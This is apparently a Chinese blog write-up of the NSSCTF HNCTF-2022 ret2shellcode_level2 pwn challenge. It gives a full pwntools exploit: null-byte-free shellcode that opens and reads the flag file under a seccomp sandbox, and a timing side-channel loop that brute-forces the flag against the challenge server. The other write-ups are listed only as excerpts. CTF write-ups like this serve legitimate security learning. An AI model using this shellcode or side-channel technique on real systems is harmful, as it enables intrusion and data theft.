NSSCTF-HNCTF-2022-ret2shellcode_level2 题解

Created2026-02-06|Updated2026-02-06|NSSCTF 题解

|Post Views:

题目

checksec

这是什么鸭

IDA

这是什么鸭

bss 段为 rwx ， buff 在 bss 段上，但是注意 strcpy 会被 \x00 截断，因此写入的 shellcode 不能有 \x00

这是什么鸭

白名单沙箱：仅允许 open 、 read 、 mmap 系统调用

没有 write ，因此考虑侧信道爆破，再加一点小巧思避免 \x00 出现即可

exp

from pwn import *

context.log_level = 'info'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']

debug = 0

def conn():
	if debug:
		return process('./ret2shellcode_level2')
	else:
		return remote('node5.anna.nssctf.cn', 28199)

rwx_base = 0x404060
again_addr = 0x40132B

def scgen(idx, char):
	sth = f'mov cl, 0x{idx:x}'
	sc = asm(f'''
		xor rdi, rdi
		xor rsi, rsi
		xor rdx, rdx
		  
		xor rax, rax
		add al, 0x67
		shl rax, 8
		add al, 0x61
		shl rax, 8
		add al, 0x6c
		shl rax, 8
		add al, 0x66
		shl rax, 8
		add al, 0x2f
		push rax
		push rsp
		pop rdi
		xor rax, rax
		add al, 2
		syscall

		xor rdi, rdi
		add dil, 3
		push rsp
		pop rsi
		xor rdx, rdx
		add dl, 0x7f
		xor rax, rax
		syscall

		xor rcx, rcx
		{'' if idx == 0 else sth}
		mov al, [rsp + rcx]
		cmp al, 0x{char:x}
		LOOP:
		je LOOP
	''')
	return sc

def test(idx, char):
	io = conn()
	sc = scgen(idx, char).ljust(0x100, b'\x00')
	payload = sc + p64(rwx_base + 0x400) + p64(rwx_base)
	io.sendline(payload)
	start_time = time.time()
	io.recvall(timeout = 2)
	end_time = time.time()
	io.close()
	return end_time - start_time

def attack():
	flag = ''
	idx = len(flag)
	while True:
		for char in range(32, 127):
			try:
				if test(idx, char) > 1.7:
					print(f'Found char at {idx}: {chr(char)} | Current Flag: {flag}')
					flag += chr(char)
					if chr(char) == '}':
						return flag
					break
				else:
					print(f'Test char failed at {idx}: {chr(char)} | Current Flag: {flag}')
			except Exception as e:
				char -= 1
				print(f'Error:{e}')
				continue
		idx += 1
	return flag

print(f"Flag: {attack()}")

Author: RatherHard

Link: https://www.ratherhard.com/post/NSSCTF/HNCTF-2022-ret2shellcode_level2.html

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

pwn NSSCTF shellcode 侧信道爆破

Related Articles

NSSCTF-CISCN-2022-login_normal 题解

题目题目链接 checksec IDA main vuln root shellcode 有 shellcode 执行攻击思路读懂代码后发现难点主要在构造 printable shellcode 上今天状态不好，没有深入研究，用的 ae64 ，之后会自己试着搓一个看看 exp 1234567891011121314151617181920212223from pwn import *from ae64 import AE64context.log_level = 'debug'context.arch = 'amd64'context.terminal = ['tmux', 'splitw', '-h']debug = 1if debug: io = process('./service')else: io = remote('node5.buuoj.cn', 26980)def attack(): payload = b...

NSSCTF-强网杯-2022-devnull 题解

题目题目链接 vmmap 0x3fe000 处为 rw 之后 0x404000 会变成只读 IDA main vuln fgets 最多读取 n-1 个字节，最后一个字节会被设置为 \x00 有关于 fgets 的 off_by_null ，可将 fd 设置为 0 ，为标准输入流的文件描述符，从而启用下方的 read close(1) 会关闭标准输出流，之后不会有回显，但标准错误流还在 mywrite mprotect 设置 0x404000 为只读关于 mprotect 有一个坑：其地址必须对齐 0x1000 gadget 用于操纵 rax 攻击思路栈迁移难度不高考虑用 mprotect 开 rwx 区域用于写入 shellcode ，但这需要将 rdx 设置为 7 ，这一点利用 mywrite("Thanks\n"); 刚好可以实现然后利用 gadget 操纵 rax 以间接操纵 rdi 即可完成 mprotect 的调用（注意对齐 0x1000），然后写入 shellcode 即可吐槽 tnnd 为什么不给 libc 版本，，，本...

NSSCTF-CISCN-2021-silverwolf 题解

题目题目链接 checksec 全开 IDA main 菜单题 initbuf 有沙箱，需要 orw allocate 同一时间只能掌控一个 chunk ，最大为 0x78 edit show 用于 leak delete 有 UAF 攻击思路挺棘手的，这道题目没有任何 leak pie 和 leak stack 的手段，只能 leak libc 和 leak heap 利用 UAF 和 tcache 机制我们可以轻松 leak heap ，并把 tcache_pthread_struct 扔进 unsorted_bin 以 leak libc ，同时还可以保留 tcache_pthread_struct 的写入权限劫持到 tcache_pthread_struct 后有一个好处：我们获得了 tcache_entries 的控制权，这意味着我们可以轻松指定下一次指定大小的 chunk 的分配地址，这有利于我们布置 rop 链以及接下来的 setcontext 技巧由于我们没办法直接劫持程序流程，而且要实现 orw 的话直接劫持 free_hook 不够（参...

NSSCTF-CISCN-2022-house_of_cat 题解

题目题目链接 checksec seccomp 只能 orw ，但是限制 read 的 fd 为 0 ，于是可以先 close(0) 再 orw IDA main handle_command parse_command 需要逆向解析出指令格式 execute_command menu 套一层指令解析的菜单题 add 只能申请 largerequest 0x420~0x470 ，放入 largebin 的话， 0x420~0x430 一个 bin ， 0x440~0x470 一个 bin edit edit 限制为两次，只能写 0x30 show 用于 leak delete 有 UAF 攻击思路先分析出命令格式： COMMAND | r00tQWB QWXFarg 然后发现要 login 成为管理员，再 cat 拿菜单 12LOGIN | r00tQWB QWXFadminCAT | r00tQWB QWXF\xff 之后就是堆题只能申请固定范围内的 largebin ，考察 largebin attack 技巧，而 edit_count 的限制让...

NSSCTF-GHCTF-2025-ret2libc2 题解

题目题目链接 checksec vmmap 这里的 0x3fe000 在远端貌似不存在，被坑了，，， IDA main func 栈溢出漏洞 got onegadget 需要用 gadget 操纵寄存器攻击思路第一次栈迁移到 got 上 leak 出 printf 的地址以获取 libc 基址第二次栈迁移为 onegadget 执行提供栈空间 exp 123456789101112131415161718192021222324252627282930313233343536from pwn import *from onegadget_selector import *context.log_level = 'debug'context.arch = 'amd64'context.terminal = ['tmux', 'splitw', '-h']debug = 0if debug: io = process('./pwn_patched...

NSSCTF-GHCTF-2025-真会布置栈吗？题解

题目题目链接 checksec vmmap 没有 rwx 段， ret2shellcode 比较困难 IDA start 泄露了栈地址，有栈溢出 gadget xchg 是交换指令攻击思路其实就是 ret2syscall ，但是在栈的布局上要下点功夫，可以在一次输入内就完成攻击布局思路：（其实就是利用 dispatcher 的特性让 rbx 拥有类似 rip 和 rsp 结合体的功能） 1234567 syscall_addr dispatcher xchg_addrr15 dispatcher xor_rsi_addrr13 print1 59 xor_rdx_addrrbx rsp↑ [stack]---->[ ]rdi print2 [stack]---->"/bin/sh\x00"rsi print3 gadget 整合一下： 123456789...